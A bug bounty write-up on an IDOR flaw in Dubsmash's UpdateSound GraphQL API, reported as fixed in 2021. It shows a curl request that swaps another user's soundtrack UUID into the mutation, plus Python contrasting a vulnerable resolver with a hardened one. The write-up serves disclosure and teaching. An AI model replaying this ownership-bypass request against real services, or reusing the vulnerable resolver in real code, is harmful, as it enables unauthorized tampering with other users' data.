Vulnerability Overview
Dubsmash, a widely-used social media platform, enables users to create short lip-syncing videos using soundtracks from its library or user-uploaded content. During my security research on the iOS application, I discovered a critical Insecure Direct Object Reference (IDOR) vulnerability in the UpdateSound GraphQL API endpoint. This flaw allowed attackers to bypass authorization and manipulate the metadata of any soundtrack, potentially jeopardizing the integrity of the entire music library.
Understanding the Vulnerability
An Insecure Direct Object Reference (IDOR) occurs when an application grants access to objects (such as files, database entries, or records) based on user-supplied identifiers without verifying that the requesting user is permitted to act on them. In Dubsmash, the application never checked whether the uuid parameter in the UpdateSound API request referred to a soundtrack owned by the logged-in user.
As a result, an attacker could modify the title of any soundtrack simply by knowing its UUID, a value that was publicly exposed in various API responses.
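To make the missing check concrete, here is an added example (not Dubsmash's code) of a resolver for an UpdateSound-style mutation in the vulnerable form beside the hardened form. It assumes a hypothetical in-memory store where each sound records its owner, and that the authenticated user id arrives from the request context rather than from the mutation variables.

```python
"""Ownership check for an UpdateSound-style GraphQL mutation resolver.

Hypothetical model (not Dubsmash's code): each Sound carries an owner_id,
and the resolver receives the authenticated user id from the request
context plus the mutation's `variables` object, shaped like the request
in this writeup: {"input": {"uuid": "...", "name": "..."}}.
"""
from dataclasses import dataclass


class NotAuthorized(Exception):
    """Raised when the caller does not own the object it tries to modify."""


@dataclass
class Sound:
    uuid: str
    owner_id: str
    name: str


def make_sample_store() -> dict:
    """Constructed sample data: two users, each owning one sound."""
    return {
        "sound-aaaa": Sound("sound-aaaa", "user-1", "My track"),
        "sound-bbbb": Sound("sound-bbbb", "user-2", "Someone else's track"),
    }


def update_sound_vulnerable(store: dict, current_user_id: str, variables: dict) -> Sound:
    """The IDOR pattern: the uuid from the request is trusted as-is and the
    authenticated identity is never compared against the object's owner."""
    sound_input = variables["input"]
    sound = store[sound_input["uuid"]]
    sound.name = sound_input["name"]
    return sound


def update_sound_fixed(store: dict, current_user_id: str, variables: dict) -> Sound:
    """Hardened resolver: look the object up, then verify ownership against
    the server-side identity before writing any field. Missing and foreign
    uuids yield the same error so the response does not reveal which uuids
    exist."""
    sound_input = variables["input"]
    sound = store.get(sound_input["uuid"])
    if sound is None or sound.owner_id != current_user_id:
        raise NotAuthorized("sound not found")
    sound.name = sound_input["name"]
    return sound
```

The same pattern applies to every mutation that takes an object identifier: resolve the object first, then decide authorization from the session, never from the client-supplied input.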
How the Vulnerability Was Exploited
Here’s a step-by-step breakdown of how I identified and exploited the issue:
- Uploading a Soundtrack: I uploaded a soundtrack to my "My Sounds" section within the Dubsmash iOS app.
- Capturing the Request: I edited the soundtrack title and captured the HTTP request sent to the vulnerable UpdateSound GraphQL API endpoint using Burp Suite.
- Altering the UUID: I replaced the uuid parameter in the request with the UUID of another soundtrack (accessible from multiple API responses).
- Forwarding the Request: The manipulated request was forwarded to the server. The result? The title of the target soundtrack was successfully changed.
Here’s the vulnerable HTTP request:
curl -X POST \
-H "Authorization: Bearer XXXXXX" \
-H "Content-Type: application/json" \
--data-binary '{
"query": "mutation UpdateSound($input: UpdateSoundInput!) { updateSound(input: $input) { sound { uuid name } } }",
"variables": {
"input": {
"uuid": "TARGET_UUID",
"name": "Modified Title"
}
}
}' https://gateway-production.dubsmash.com/graphql
Impact
This vulnerability had severe implications:
- Unauthorized Edits: Any attacker could alter soundtrack titles simply by knowing their UUIDs, which were publicly available.
- Mass Exploitation: By automating the process, an attacker could modify the entire Dubsmash music library.
Timeline
- Feb 13, 2021: Submitted the vulnerability report to Reddit’s bug bounty program (which oversees Dubsmash security).
- Feb 22, 2021: Reddit’s security team requested additional information.
- Feb 24, 2021: Vulnerability was triaged by the security team.
- Mar 1, 2021: The issue was resolved, and I received a $3,000 bounty for my efforts.
Conclusion
This bug bounty research highlights the dangers of IDOR vulnerabilities in modern applications. Even a minor oversight, such as failing to validate object ownership, can expose systems to significant exploitation. To protect sensitive data and ensure platform integrity, developers must adopt strict access controls and thoroughly test their APIs.
Founder & CEO @ Appsecure Security